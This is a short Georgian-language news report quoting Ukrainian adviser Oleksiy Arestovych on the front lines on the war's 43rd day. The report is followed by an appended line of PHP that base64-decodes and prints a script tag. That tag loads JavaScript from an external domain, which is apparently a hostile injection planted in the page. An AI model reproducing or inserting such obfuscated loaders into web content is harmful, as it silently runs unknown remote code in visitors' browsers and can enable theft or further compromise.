celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის მრჩევლის ოლექსეი არესტოვიჩის განცხადებით, იმ 9 მიმართულებაზე უკრაინაში, სადაც რუსეთის ჯარები დაწინაურებული იყვნენ, ოკუპანტი მხოლოდ დონეცკში, ლუგანსკსა და სანახევროდ მარიუპოლში რჩება. მისივე განმარტებით, ხერსონის ოლქში ოკუპანტის ჯარი თავდაცვის რეჟიმშია.
 
"რუსეთ-უკრაინის ომის აქტიური ფაზის 43-ე დღეს პოლიტიკურ ვითარებას უკრაინის ხელისუფლება და თავდაცვის შეიარაღებული ძალების ხელმძღვანელობა აკონტროლებს. იმ 9 მიმართულებაზე, სადაც რუსეთის ჯარები დაწინაურებული იყვნენ, მტერი მხოლოდ დონეცკში, ლუგანსკსა და სანახევროდ მარიუპოლში რჩება. რუსეთის ჯარი ხერსონის ოლქში წინ აღარ მიიწევს, არამედ თავდაცვის რეჟიმშია.
 
მტერმა ასევე განაახლა შეტევა მარიუპოლის წინააღმდეგ, მაგრამ უკრაინის ჯარები რთულ პირობებში იცავენ თავს. მთავრობა მათ ყველა შესაძლო დახმარებას უწევს. აქტიური სამხედრო ოპერაციები მიმდინარეობს ლუგანსკის ოლქის სამხრეთ-დასავლეთით, რუბეჟნოეს, პოპასნაიასა და სევეროდონეცკის მახლობლად. ეს ის ადგილებია, სადაც ჩვენი ჯარები იკავებენ ხაზს, იწყებენ კონტრშეტევებს და მტერს ძალიან რთულ ვითარებაში აკავებენ," - აცხადებს არესტოვიჩი.
771
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");